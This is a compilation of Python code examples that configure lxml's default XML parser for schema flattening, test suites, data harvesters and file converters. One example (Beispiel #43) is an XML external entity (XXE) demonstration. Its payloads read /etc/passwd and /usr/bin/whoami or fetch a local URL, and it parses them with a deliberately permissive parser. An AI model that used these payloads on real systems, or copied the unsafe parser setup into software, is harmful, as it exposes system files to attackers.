            parser=etree.XMLParser(remove_blank_text=True,
                                   remove_comments=True,
                                   remove_pis=True))

        # parse the XML string, then replace the includes by their content
        tree = XSDTree.build_tree(self.xml_string)
        return self._replace_all_includes_by_content(tree)
Beispiel #26
0
    def test_reverse24x24conversion(self):
        """Compare each generated 24px SVG, shrunk to 22px, with its 22px resource.

        For every non-symlink ``.svg`` under GEN_DIR whose path contains
        ``/24``: the generated root is resized to 22x22, the children of its
        first ``g`` group (as returned by ``get_renderable_elements``) are
        moved up to the root, and the elements are compared pairwise with
        those of the matching file under RES_DIR.
        """
        self.maxDiff = None
        for dirpath, _dirnames, filenames in os.walk(GEN_DIR):
            for filename in filenames:
                # Generated filepath
                gen_filepath = os.path.join(dirpath, filename)

                # Only regular 24px SVG files are of interest
                is_24px_svg = filename.endswith('.svg') and '/24' in gen_filepath
                if not is_24px_svg or os.path.islink(gen_filepath):
                    continue

                etree.set_default_parser(
                    etree.XMLParser(remove_blank_text=True))

                # Generated root
                gen_root = etree.parse(gen_filepath).getroot()

                # Res filepath and root
                res_filepath = gen_filepath.replace(GEN_DIR, RES_DIR, 1)
                res_filepath = res_filepath.replace('/24', '/22')
                res_root = etree.parse(res_filepath).getroot()

                # Resize to 22x22
                for attr_name, attr_value in (('viewBox', "0 0 22 22"),
                                              ('width', "22"),
                                              ('height', "22")):
                    gen_root.set(attr_name, attr_value)

                # Remove group that moves content down 1px, right 1px
                group = gen_root.find('./{http://www.w3.org/2000/svg}g',
                                      NAMESPACES)
                gen_root.extend(get_renderable_elements(group))
                gen_root.remove(group)

                # Compare elements and attributes. Every attribute of the
                # generated element must also be present on the resource
                # element (zip stops at the shorter of the two sequences).
                element_pairs = zip(res_root.iterfind('./svg:*', NAMESPACES),
                                    gen_root.iterfind('./svg:*', NAMESPACES))
                for res_elem, gen_elem in element_pairs:
                    self.assertEqual(gen_elem.tag, res_elem.tag, gen_filepath)
                    for attribute in gen_elem.items():
                        self.assertIn(attribute, res_elem.items(),
                                      gen_filepath)
    def test_reload_attribute(self):
        """Reload the ``attribute/basic`` complex type from existing XML.

        Generates the complex type with ``curate_edit`` enabled, using the
        fixture XML as edit data, then compares the second item of the
        result with the ``.reload`` JSON fixture.
        """
        xsd_files = join('attribute', 'basic')
        xsd_tree = self.complex_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath('/xs:schema/xs:complexType', namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.complex_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode('utf-8')) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)
        result_string = generate_complex_type(self.request, xsd_element, xsd_tree, full_path='/root',
                                              edit_data_tree=edit_data_tree)

        expected_element = self.complex_type_data_handler.get_json(xsd_files + '.reload')
        self.assertDictEqual(result_string[1], expected_element)
def main():
    """Write a visualisation-enabled copy of the generic kilobot ARGoS config.

    ``sys.argv[1]`` names the folder holding
    ``kilobot_generic_controller.argos``; the folder is created when it does
    not exist. The ``linearvelocity`` attribute of the ``params`` elements
    (the last one carrying it wins, ``"0.0"`` when none does) is copied to the
    ``speed`` attribute of every ``loop_functions`` element, a
    ``visualization/qt-opengl/camera/placement`` subtree is appended to the
    root, and the result is written next to the input as
    ``kilobot_generic_controller_viz.argos``.

    Exits with status -1 (after calling ``print_help``) when no folder
    argument is given.
    """
    # Keep comments when parsing so they survive into the written copy.
    parser = etree.XMLParser(remove_comments=False)
    etree.set_default_parser(parser)

    if len(sys.argv) < 2:
        print_help()
        # sys.exit rather than the exit() helper, which is only injected by
        # the site module and is missing under ``python -S`` or frozen builds.
        sys.exit(-1)

    folder = sys.argv[1]
    if not os.path.exists(folder):
        os.makedirs(folder)

    tree = etree.parse(os.path.join(folder, "kilobot_generic_controller.argos"))
    root = tree.getroot()

    speed = "0.0"
    for params in root.iter('params'):
        speed = params.get("linearvelocity", speed)

    for loop_functions in root.iter('loop_functions'):
        loop_functions.set("speed", speed)

    visualization = etree.SubElement(root, "visualization")
    qt_opengl = etree.SubElement(visualization, "qt-opengl")
    camera = etree.SubElement(qt_opengl, "camera")
    etree.SubElement(camera,
                     "placement",
                     idx="0",
                     position="-0.616296,0.025,0.461661",
                     look_at="0.0978462,0.025,-0.23834",
                     up="0.700001,0,0.714142",
                     lens_focal_length="20")

    tree.write(os.path.join(folder, "kilobot_generic_controller_viz.argos"),
               xml_declaration=True)
Beispiel #29
0
    def get_flat(self):
        """Return the schema with each ``xs:include`` replaced by its content.

        ``self.xmlString`` is parsed with blank text, comments and processing
        instructions removed. For every ``include`` child of the root, the
        flattened dependency returned by ``self.get_flat_dependency`` for its
        ``schemaLocation`` is parsed and its top-level children are appended
        to the root; the ``include`` element itself is always removed, also
        when no dependency could be obtained (``None``).

        Returns:
            The flattened tree serialized with ``etree.tostring``.
        """
        parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        # The parse/fromstring calls below pass no parser and therefore use
        # this default one.
        etree.set_default_parser(parser=parser)

        # parse the XML String removing blanks, comments, processing instructions
        xmlTree = etree.parse(BytesIO(self.xmlString.encode('utf-8')))
        root = xmlTree.getroot()

        for el_include in xmlTree.findall("{http://www.w3.org/2001/XMLSchema}include"):
            uri = el_include.attrib['schemaLocation']
            flatDependency = self.get_flat_dependency(uri)
            if flatDependency is not None:
                dependencyTree = etree.fromstring(flatDependency)
                # list(element) snapshots the children (appending moves them
                # out of dependencyTree); it replaces the deprecated
                # getchildren().
                for element in list(dependencyTree):
                    root.append(element)
            el_include.getparent().remove(el_include)
        return etree.tostring(xmlTree)
    def get_flat(self):
        """Flatten the schema by inlining the content of its ``xs:include`` elements.

        The schema text in ``self.xmlString`` is parsed without blank text,
        comments or processing instructions. Each ``include`` found directly
        under the root is resolved through ``self.get_flat_dependency`` using
        its ``schemaLocation``; when that yields content, the content's
        top-level children are moved under the root. Every ``include`` element
        is removed, whether or not it could be resolved.

        Returns:
            The resulting tree serialized with ``etree.tostring``.
        """
        parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        # Installed as the default parser because the calls below do not pass
        # one explicitly.
        etree.set_default_parser(parser=parser)

        xmlTree = etree.parse(BytesIO(self.xmlString.encode('utf-8')))
        schema_root = xmlTree.getroot()

        includes = xmlTree.findall("{http://www.w3.org/2001/XMLSchema}include")
        for el_include in includes:
            flatDependency = self.get_flat_dependency(el_include.attrib['schemaLocation'])
            if flatDependency is not None:
                # Copy the child list first: extend() re-parents the elements.
                # list(element) is the supported replacement for the
                # deprecated getchildren().
                schema_root.extend(list(etree.fromstring(flatDependency)))
            el_include.getparent().remove(el_include)
        return etree.tostring(xmlTree)
    def test_sequence(self):
        """Reload the basic ``sequence`` extension from existing XML data.

        The extension element of the XSD fixture is generated together with
        the matching XML data (empty default value), and the second item of
        the result is compared with the ``<fixture>.reload`` JSON fixture.
        """
        fixture = join('sequence', 'basic')
        handler = self.extension_data_handler

        schema = handler.get_xsd(fixture)
        extension_path = '/xs:schema/xs:element/xs:complexType/xs:complexContent/xs:extension'
        extension = schema.xpath(extension_path,
                                 namespaces=self.session['namespaces'])[0]

        serialized = etree.tostring(handler.get_xml(fixture))

        # Install a parser that drops blank text, comments and processing
        # instructions before re-reading the serialized data.
        etree.set_default_parser(
            parser=etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True))
        reloaded_tree = etree.XML(str(serialized.encode('utf-8')))

        generated = generate_extension(self.request, extension, schema, full_path='/root[1]',
                                       default_value='', edit_data_tree=reloaded_tree)

        expected = handler.get_json(fixture + '.reload')
        self.assertDictEqual(generated[1], expected)
Beispiel #32
0
def get_tree_and_root_by_file_name(input_file_name=None, log_file=None,
                                   verbosity=None):
    '''
    Parse the given input file as an XML document.

    The file is opened as text with the 'utf-8-sig' encoding and parsed with
    a parser that removes blank text and keeps comments; that parser is also
    installed as the lxml default parser.

    :param input_file_name: path of the file to parse
    :param log_file: file object that receives a message when parsing or
        reading fails (None makes print() fall back to standard output)
    :param verbosity: unused
    :return: tuple (doctree, doctree.getroot()), or (None, None) when the
        file could not be opened, read or parsed
    '''
    me = 'get_tree_and_root_by_file_name'

    parser = etree.XMLParser(encoding='utf-8', remove_blank_text=True,
                             remove_comments=False)
    etree.set_default_parser(parser)

    try:
        with open(input_file_name, mode='r', encoding='utf-8-sig') \
                as input_bytes_file:
            try:
                tree = etree.parse(input_bytes_file, parser=parser)
            except Exception as e:
                # Parse failures are only written to the log file.
                log_msg = (
                    "{}:Skipping exception='{}' in input_file_name='{}'"
                    .format(me, repr(e), input_file_name))
                print(log_msg, file=log_file)
                return None, None
    except Exception as ex:
        # Failures to open/read are reported to the log file and to stdout;
        # the exception is included so the cause is not lost.
        msg = (f"{me}: skipping exception='{ex!r}' "
               f"to read {input_file_name}")
        print(msg, file=log_file, flush=True)
        print(msg, flush=True)
        return None, None

    return tree, tree.getroot()
Beispiel #33
0
#!/usr/bin/env python3

from lxml import etree
etree.set_default_parser(etree.HTMLParser())
import os
import subprocess
import requests
from urllib.parse import urljoin
from io import BytesIO

tmpdir = './tmp/'
indexes = [
    'http://www.budget.gov.au/2014-15/content/bp1/html/index.htm',
    'http://www.budget.gov.au/2014-15/content/bp2/html/index.htm',
    'http://www.budget.gov.au/2014-15/content/bp3/html/index.htm',
    'http://www.budget.gov.au/2014-15/content/bp4/html/index.htm' ]
chunk_size = 4096

def main():
    """Collect local target paths for the "consolidated" PDFs of each index page.

    Every page in ``indexes`` is downloaded and parsed; for each link whose
    ``href`` contains ".pdf" and the word "consolidated", a numbered path
    ``<tmpdir>/<n>.pdf`` is added to the local ``pdfs`` list.

    NOTE(review): the collected list is neither returned nor used here; the
    rest of the function may be missing from this excerpt.
    """
    pdfs = []
    for index_uri in indexes:
        print("up to:", index_uri)
        page = etree.parse(BytesIO(requests.get(index_uri).content))
        for link in page.xpath('//a[contains(@href, ".pdf")]'):
            if 'consolidated' in link.get('href'):
                pdfs.append(os.path.join(tmpdir, '%d.pdf' % len(pdfs)))
Beispiel #34
0
from scrapi.base.transformer import XMLTransformer, JSONTransformer
from scrapi.base.helpers import (
    updated_schema,
    build_properties,
    oai_get_records_and_token,
    compose,
    date_formatter,
    null_on_error,
    coerce_to_list
)

logging.basicConfig(level=logging.INFO)

logger = logging.getLogger(__name__)

etree.set_default_parser(etree.XMLParser(recover=True))


class HarvesterMeta(abc.ABCMeta):
    """Metaclass that registers an instance of each concrete, enabled class.

    A class is instantiated and stored in ``registry`` under its
    ``short_name`` when it has no abstract methods left and its
    ``short_name`` is not listed in ``settings.disabled``; otherwise an info
    message is logged.
    """

    def __init__(cls, name, bases, dct):
        super(HarvesterMeta, cls).__init__(name, bases, dct)
        # short_name is only looked up for classes without abstract methods.
        if cls.__abstractmethods__ or cls.short_name in settings.disabled:
            logger.info('Class {} not added to registry'.format(cls.__name__))
            return
        registry[cls.short_name] = cls()


@six.add_metaclass(HarvesterMeta)
class BaseHarvester(object):
    """ This is a base class that all harvesters should inheret from
#!/usr/bin/env python
# SetupCophylogenyAnalysis.py

import sys
from optparse import OptionParser
# Prefer lxml when it is installed and make its default parser drop blank
# text and comments; otherwise fall back to the standard library ElementTree.
try:
    from lxml import etree as ElementTree
    from lxml.etree import Element, Comment, XMLParser
    ElementTree.set_default_parser(XMLParser(remove_blank_text=True,
                                             remove_comments=True))
except ImportError:
    # Python 2 print-to-stream syntax: the notice goes to standard error.
    print >> sys.stderr, '*** lxml unavailable, falling back on standard XML', \
                         'implementation ***'
    # Note: XMLParser is not imported on this fallback path.
    from xml.etree import ElementTree
    from xml.etree.ElementTree import Element, Comment

# Command-line options; each value is stored under the given ``dest`` name.
parser = OptionParser()
parser.add_option('-a', '--associations', dest='assoc_filename')
parser.add_option('-i', '--host', dest='HOST_TAXON')
parser.add_option('-j', '--host-xml', dest='HOST_XML')
parser.add_option('-s', '--symbiont', dest='SYMBIONT_TAXON')
parser.add_option('-t', '--symbiont-xml', dest='SYMBIONT_XML')

# Parsed at import time: ``options`` holds the values above, ``args`` the
# remaining positional arguments.
(options, args) = parser.parse_args()

# XML tags, attributes, etc.
ATTR = 'attr'
BRANCH_RATES = 'branchRates'
CLOCK = 'clock'
COALESCENT_LIKELIHOOD = 'coalescentLikelihood'
COEVOLUTION = 'coevolution'
Beispiel #36
0
from xmodule.mako_module import MakoDescriptorSystem
from xmodule.modulestore import COURSE_ROOT, LIBRARY_ROOT, ModuleStoreEnum, ModuleStoreReadBase
from xmodule.modulestore.xml_exporter import DEFAULT_CONTENT_FIELDS
from xmodule.tabs import CourseTabList
from xmodule.x_module import (  # lint-amnesty, pylint: disable=unused-import
    AsideKeyGenerator, OpaqueKeyReader, XMLParsingSystem, policy_key)

from .exceptions import ItemNotFoundError
from .inheritance import InheritanceKeyValueStore, compute_inherited_metadata, inheriting_field_data

edx_xml_parser = etree.XMLParser(dtd_validation=False,
                                 load_dtd=False,
                                 remove_comments=True,
                                 remove_blank_text=True)

etree.set_default_parser(edx_xml_parser)

log = logging.getLogger(__name__)


class ImportSystem(XMLParsingSystem, MakoDescriptorSystem):  # lint-amnesty, pylint: disable=abstract-method, missing-class-docstring
    def __init__(
            self,
            xmlstore,
            course_id,
            course_dir,  # lint-amnesty, pylint: disable=too-many-statements
            error_tracker,
            load_error_modules=True,
            target_course_id=None,
            **kwargs):
        """
Beispiel #37
0
import traceback
import threading
from Queue import Queue


__author__ = 'leifj'


def _is_self_signed_err(ebuf):
    for e in ebuf:
        if e['func'] == 'xmlSecOpenSSLX509StoreVerify' and re.match('err=18', e['message']):
            return True
    return False


etree.set_default_parser(etree.XMLParser(resolve_entities=False))


def _e(error_log, m=None):
    def _f(x):
        if ":WARNING:" in x:
            return False
        if m is not None and not m in x:
            return False
        return True

    return "\n".join(filter(_f, ["%s" % e for e in error_log]))


class MetadataException(Exception):
    """Exception type of this module; adds nothing to ``Exception``."""
Beispiel #38
0
# NOTE(review): the help text speaks of an HTML file, but the value is passed
# to os.listdir() below, i.e. it is treated as a directory of .html files.
parser.add_argument('-f', '-filePath', dest='filePath', help='Facebook chat log file (HTML file)',
                    default='raw/messages')
parser.add_argument("-max", "-maxExportedMessages", dest='maxExportedMessages', type=int, default=1000000,
                    help="maximum number of messages to export")
args = parser.parse_args()

# Copy the parsed options into module-level names.
maxExportedMessages = args.maxExportedMessages
ownName = args.ownName
filePath = args.filePath

# Module-level accumulators, all starting empty / at zero.
data = []
warnedNameChanges = []
nbInvalidSender = 0

# make sure we don't crash if chat logs contain exotic characters
# (recover=True lets the parser continue past malformed input)
etree.set_default_parser(etree.XMLParser(encoding='utf-8', ns_clean=True, recover=True))

# One pass per .html file found directly in filePath.
for filename in os.listdir(filePath):

    if not filename.endswith('.html'):
        continue

    # Parsed with the default parser configured above.
    archive = etree.parse(filePath + "/" + filename)

    # The file name without its .html suffix serves as the conversation id.
    conversationId = filename.replace('.html', '')
    # Per-file state, reset for every conversation file.
    groupConversation = False
    timestamp = ''
    senderName = ''
    conversationWithName = None
    text = ''
Beispiel #39
0
from lxml import etree

from django.db import models
from django.db.models import signals
from django.utils.translation import ugettext as _
from django.core import urlresolvers
from django.template import defaultfilters
from django.conf import settings
from django.core.cache import cache

import gdata.youtube
import gdata.youtube.service

logger = logging.getLogger(__name__)
# Prevent: XMLSyntaxError: Attempt to load network entity
etree.set_default_parser(etree.XMLParser(no_network=False, recover=True))

def youtube_entry_generator(entries, exclude=''):
    """Yield the entries whose id URL ends in a usable, non-excluded id.

    The id is the last path segment of ``entry.id.text``, made only of
    letters, digits, ``_`` and ``-``. Entries are skipped when the URL does
    not match, when the captured id is empty (for example a URL ending in
    ``/``), or when the id is ``in exclude``.
    """
    id_pattern = r'.*/([0-9A-Za-z_-]*)/?$'
    for entry in entries:
        found = re.match(id_pattern, entry.id.text)
        video_id = found.group(1) if found else None
        if video_id and video_id not in exclude:
            yield entry
Beispiel #40
0
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
"""

from lxml import etree

from .utils import odict

xml_failures = {}
etree.set_default_parser(etree.XMLParser(remove_comments=True))


class XMLSyntaxError(Exception):
    """Exception wrapping an error log; each instance is recorded in ``xml_failures``."""

    def __init__(self, error_log):
        """Keep ``error_log`` and file it under the filename of its last error."""
        self._error_log = error_log
        failed_file = error_log.last_error.filename
        xml_failures[failed_file] = error_log

    def __str__(self):
        """Return the entries of ``filter_from_errors()``, one per line."""
        entries = self._error_log.filter_from_errors()
        return '\n'.join(str(entry) for entry in entries)


def validate_dtd(xml_file, dtd_file=None):
    """
    Validate an xml file against its dtd.
Beispiel #41
0
    def __init__(self, file_name=None, input_stream=None, language=None,
                 version="2.0", header=None, encoding="utf-8",
                 dtd_validation=False):
        """ Prepare the document basic structure.

        The tree is parsed from ``file_name`` when given, otherwise from
        ``input_stream``, otherwise a new document with an empty root is
        created. Afterwards the header, raw and text layers are located or
        created, and the optional layers are located (``None`` when absent).

        :param file_name: path of an existing document to parse.
        :param input_stream: document content; ``unicode`` input is encoded
            with ``encoding`` before parsing.
        :param language: when truthy, stored in the root's language attribute.
        :param version: when truthy, stored in the root's version attribute.
        :param header: when truthy, passed to ``self.set_header``.
        :param encoding: kept on the instance; used to encode ``unicode``
            input.
        :param dtd_validation: forwarded to ``etree.XMLParser``.
        """
        self.encoding = encoding
        self.logger = getLogger(__name__)
        parser = etree.XMLParser(
            remove_comments=False, dtd_validation=dtd_validation)
        # The parse calls below pass no parser and rely on this default one.
        etree.set_default_parser(parser)

        if file_name:
            self.tree = etree.parse(file_name)
            self.root = self.tree.getroot()
        elif input_stream:
            if isinstance(input_stream, unicode):
                input_stream = input_stream.encode(encoding)
            self.root = etree.fromstring(input_stream)
            self.tree = etree.ElementTree(self.root)
        else:
            self.root = etree.Element(self.KAF_TAG, self.NS)
            self.tree = etree.ElementTree(self.root)
        if language:
            self.root.attrib[self.LANGUAGE_ATTRIBUTE] = language

        if version:
            self.root.set(self.VERSION_ATTRIBUTE, version)

        def _populated_layer(tag):
            # Return the element found for ``tag`` if it has child elements,
            # else None. len() of an element is its number of children, so an
            # element that exists without children counts as absent.
            layer = self.tree.find(tag)
            if layer is not None and len(layer):
                return layer
            return None

        # NOTE(review): for the header, raw and text layers an existing but
        # childless element is treated like a missing one, so a second
        # element is created - confirm this is intended.
        self.kaf_header = _populated_layer(self.KAF_HEADER_TAG)
        if self.kaf_header is None:
            # create nafheader element and put it in the beginning of
            # the document
            self.kaf_header = etree.Element(self.KAF_HEADER_TAG)
            self.root.insert(0, self.kaf_header)

        if header:
            self.set_header(header)

        self.raw = _populated_layer(self.RAW_LAYER_TAG)
        if self.raw is None:
            self.raw = etree.SubElement(self.root, self.RAW_LAYER_TAG)

        self.text = _populated_layer(self.TEXT_LAYER_TAG)
        if self.text is None:
            self.text = etree.SubElement(self.root, self.TEXT_LAYER_TAG)

        # Optional layers. The terms check used to test the text layer for
        # None, which raised TypeError (len(None)) when the terms layer was
        # missing; every layer is now tested against itself.
        self.terms = _populated_layer(self.TERMS_LAYER_TAG)
        self.dependencies = _populated_layer(self.DEPENDENCY_LAYER_TAG)
        self.chunks = _populated_layer(self.CHUNKS_LAYER_TAG)
        self.constituency = _populated_layer(self.CONSTITUENCY_LAYER)
        self.entities = _populated_layer(self.NAMED_ENTITIES_LAYER_TAG)
        self.coreference = _populated_layer(self.COREFERENCE_LAYER_TAG)
Beispiel #42
0
from itertools import chain
from lazy import lazy
from tempfile import NamedTemporaryFile as NamedTempFile

import regex as re
import random
from lxml import etree
from html import unescape

__all__ = ["Structure", "iterstruct", "config"]
__version__ = "0.0.0"

# disable security preventing DoS attacks with huge files
etree.set_default_parser(etree.ETCompatXMLParser(huge_tree=True))

STRUCTS = None


class Structure():
    """A structure extracted from a vertical.

    """
    def __init__(self, raw_vert, structs):
        self.raw = raw_vert.strip() + "\n"
        self.structs = structs
        first_line = self.raw.split("\n", maxsplit=1)[0]
        self.name = re.search(r"\w+", first_line).group()
        self.attr = dict(re.findall(r'(\w+)="(.*?)"', first_line))

    @lazy
    def xml(self):
Beispiel #43
0
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
'''


string_xml_external_url_1='''<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://127.0.0.1/1" >]><foo>&xxe;</foo>
'''


#Binary file (X)
string_xml_external_file='''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
  <!ENTITY file SYSTEM "file:///usr/bin/whoami">
]>
<wooyun>
  <external>&file;</external>
</wooyun>
'''

# WARNING: deliberately unsafe parser setup, used to demonstrate external
# entity (XXE) resolution. no_network=False lifts lxml's default ban on
# network access when looking up external documents.
xml_parse = etree.XMLParser(no_network=False)
etree.set_default_parser(xml_parse)
# Parsed with the default parser installed above.
# NOTE(review): string_xml_external_url is not defined in the visible part of
# this snippet (only string_xml_external_url_1 is) - confirm the name.
dom = etree.fromstring(string_xml_external_url)
node_internal = dom.xpath('//external')
# Python 2 print statement: shows the text of the first <external> element.
print node_internal[0].text

Beispiel #44
0
        print("SKIP: validation of XHTML output in functional tests"
              " (lxml < 2.0, api incompatibility)")
        etree = None

    if etree:
        class _Resolver(etree.Resolver):
            """Resolve external references to same-named files next to this module."""

            base_dir = dirname(abspath(__file__))

            def resolve(self, system_url, public_id, context):
                """Map the last path segment of ``system_url`` to a file in ``base_dir``."""
                local_name = system_url.rsplit("/", 1)[-1]
                local_path = join(self.base_dir, local_name)
                return self.resolve_filename(local_path, context)

        _parser = etree.XMLParser(dtd_validation=True)
        _parser.resolvers.add(_Resolver())
        etree.set_default_parser(_parser)

        def _format_error_log(data, log):
            msg = []
            for entry in log:
                context = data.splitlines()[max(0, entry.line - 5):
                                            entry.line + 6]
                msg.append("\n# %s\n# URL: %s\n# Line %d, column %d\n\n%s\n"
                           % (entry.message, entry.filename, entry.line,
                              entry.column, "\n".join([each.decode('utf-8')
                                                       for each in context])))
            return "\n".join(msg).encode('ascii', 'xmlcharrefreplace')

        def _validate_xhtml(func_name, *args, **kwargs):
            page = b.get_html()
            if "xhtml1-strict.dtd" not in page:
# Result of parse_log_file for each murano log, keyed by log file name.
# NOTE(review): parse_log_file is defined outside this excerpt; its return
# shape is not visible here.
ERRORS = {
    'murano-engine.log': parse_log_file(os.path.join(LOG_PATH, "murano-engine.log")),
    'murano-api.log': parse_log_file(os.path.join(LOG_PATH, "murano-api.log")),
}

# Counters, filled below from the attributes of the report's root element.
# The 'unsuccess' key is added later and is not part of this initial dict.
STATS = {
    'total': 0,
    'success': 0,
    'skip': 0,
    'error': 0,
    'failure': 0,
}

REPORT = {}

# huge_tree=True disables the parser's size limits for very large documents.
et.set_default_parser(et.XMLParser(huge_tree=True))

# The report file is the first command-line argument.
tree = et.parse(sys.argv[1])
root = tree.getroot()

# Totals come from the root's 'tests', 'failures', 'errors' and 'skip'
# attributes; a missing attribute raises KeyError.
STATS['total'] = int(root.attrib['tests'])
STATS['failure'] = int(root.attrib['failures'])
STATS['error'] = int(root.attrib['errors'])
STATS['skip'] = int(root.attrib['skip'])
# Skipped tests count as unsuccessful, so 'success' excludes them.
STATS['unsuccess'] = STATS['failure'] + STATS['error'] + STATS['skip']
STATS['success'] = STATS['total'] - STATS['unsuccess']

# One iteration per child element of the root.
for case in root:
    class_name = case.attrib['classname']

    # Screenshot path derived from the case's 'name' attribute.
    screenshot_file = 'artifacts/screenshots/%s.png' % case.attrib['name']
Beispiel #46
0
    def __init__(self, infn, edxdir='.', org="UnivX", semester="2014_Spring", verbose=False, clean_up_html=True):
        if infn.endswith('.mbz'):
            # import gzip, tarfile
            # dir = tarfile.TarFile(fileobj=gzip.open(infn))
            infnabs = os.path.abspath(infn)
            d = os.path.abspath('out/tmp')
            mdir = tempfile.mkdtemp(prefix="moodle2edx", dir=d)
            curdir = os.path.abspath('.')
            os.chdir(mdir)
            print 'Temporary dir: {}'.format(mdir)
            os.system('unzip {} -d {} > /dev/null 2>&1'.format(infnabs, mdir))
            os.chdir(curdir)
        else:
            mdir = infn
    
        if not os.path.isdir(mdir):
            print "Input argument should be directory name or moodle *.mbz backup file"
            sys.exit(0)
    
        self.verbose = verbose
        self.edxdir = path(edxdir)
        self.moodle_dir = path(mdir)
        self.clean_up_html = clean_up_html

        if not self.edxdir.exists():
            os.mkdir(self.edxdir)
        def mkdir(mdir):
            if not os.path.exists('%s/%s' % (self.edxdir, mdir)):
                os.mkdir(self.edxdir / mdir)
        edirs = ['html', 'problem', 'course', 'static']
        for ed in edirs:
            mkdir(ed)

        self.URLNAMES = []

        mfn = 'moodle_backup.xml'	# top-level moodle backup xml
        qfn = 'questions.xml'	# moodle questions xml
    
        qdict = self.load_questions(mdir, qfn)
        self.convert_static_files()

        parser = etree.XMLParser(encoding='utf-8')
        etree.set_default_parser(parser)

        moodx = etree.parse('%s/%s' % (mdir, mfn))

        info = moodx.find('.//information')
        name = info.find('.//original_course_fullname').text
        number = info.find('.//original_course_shortname').text
        contents = moodx.find('.//contents')
        number = self.make_url_name(number, extra_ok_chars='.')
    
        # start course.xml
        cxml = etree.Element('course', graceperiod="1 day 5 hours 59 minutes 59 seconds")
        cxml.set('display_name',name)
        cxml.set('number', number)
        cxml.set('org','MITx')
    
        # place each activity as a new sequential inside a chapter
        # the chapter is specified by the section (moodle sectionid)
        # sections is dict with key=sectionid, value=chapter XML
        sections = {}

        self.load_moodle_course_head(cxml)	# load the course/course.xml if it has anything

        seq = None	# current sequential
        vert = None	# current vertical
        activities = contents.findall('.//activity')
        for activity in activities:
            seq, vert = self.activity2chapter(activity, sections, cxml, seq, vert, qdict)
            
        chapter = cxml.find('chapter')
        name = name.replace('/',' ')
        chapter.set('name',name)	# use first chapter for course name (FIXME)
    
        cdir = self.edxdir
        semester = self.make_url_name(semester)
        self.write_xml(cxml, '{}/course/{}.xml'.format(cdir, semester))

        # the actual top-level course.xml file is a pointer XML file to the one in course/semester.xml
        open('%s/course.xml' % cdir, 'w').write('<course url_name="%s" org="%s" course="%s"/>\n' % (semester, org, number))
Beispiel #47
0
from furl import furl
from lxml import etree

from scrapi import util
from scrapi import registry
from scrapi import settings
from scrapi.base.schemas import OAISCHEMA
from scrapi.linter.document import RawDocument, NormalizedDocument
from scrapi.base.transformer import XMLTransformer, JSONTransformer
from scrapi.base.helpers import updated_schema, build_properties, oai_get_records_and_token

logging.basicConfig(level=logging.INFO)

logger = logging.getLogger(__name__)

etree.set_default_parser(etree.XMLParser(recover=True))


class HarvesterMeta(abc.ABCMeta):
    """Metaclass that adds an instance of each usable class to ``registry``.

    "Usable" means the class has no abstract methods and its ``short_name``
    is not in ``settings.disabled``. Any other class is only mentioned in an
    info log message.
    """

    def __init__(cls, name, bases, dct):
        super(HarvesterMeta, cls).__init__(name, bases, dct)
        # short_name is only read once the class is known to be concrete.
        is_concrete = not cls.__abstractmethods__
        if is_concrete and cls.short_name not in settings.disabled:
            registry[cls.short_name] = cls()
        else:
            logger.info('Class {} not added to registry'.format(cls.__name__))


@six.add_metaclass(HarvesterMeta)
class BaseHarvester(object):
    """ This is a base class that all harvesters should inheret from
Beispiel #48
0
from .parse_version import parse_version

import openerp
# get_encodings, ustr and exception_to_unicode were originally from tools.misc.
# There are moved to loglevels until we refactor tools.
from openerp.loglevels import get_encodings, ustr, exception_to_unicode  # noqa

_logger = logging.getLogger(__name__)

# List of etree._Element subclasses that we choose to ignore when parsing XML.
# We include the *Base ones just in case, currently they seem to be subclasses of the _* ones.
SKIPPED_ELEMENT_TYPES = (etree._Comment, etree._ProcessingInstruction,
                         etree.CommentBase, etree.PIBase, etree._Entity)

# Configure default global parser
etree.set_default_parser(etree.XMLParser(resolve_entities=False))

#----------------------------------------------------------
# Subprocesses
#----------------------------------------------------------


def find_in_path(name):
    """Look up ``name`` with ``which`` on PATH plus the configured ``bin_path``.

    The search path is the ``PATH`` environment variable (``os.defpath`` when
    unset). The ``bin_path`` config value is appended when it is set and is
    not the string ``'None'``.
    """
    search_dirs = os.environ.get('PATH', os.defpath).split(os.pathsep)
    if config.get('bin_path') and config['bin_path'] != 'None':
        search_dirs.append(config['bin_path'])
    joined_path = os.pathsep.join(search_dirs)
    return which(name, path=joined_path)


def _exec_pipe(prog, args, env=None):
    cmd = (prog, ) + args
                LAST_LOG_ENTRY['log'] += line

    return [log_record for log_record in LOG_RECORDS if log_record['level'] == "ERROR"]


# Counters, filled below from the attributes of the report's root element.
# The 'unsuccess' key is added later and is not part of this initial dict.
STATS = {
    'total': 0,
    'success': 0,
    'skip': 0,
    'error': 0,
    'failure': 0,
}

REPORT = {}

# huge_tree=True disables the parser's size limits for very large documents.
et.set_default_parser(et.XMLParser(huge_tree=True))

# The report file is the first command-line argument.
tree = et.parse(sys.argv[1])
root = tree.getroot()

# Totals come from the root's 'tests', 'failures', 'errors' and 'skip'
# attributes; a missing attribute raises KeyError.
STATS['total'] = int(root.attrib['tests'])
STATS['failure'] = int(root.attrib['failures'])
STATS['error'] = int(root.attrib['errors'])
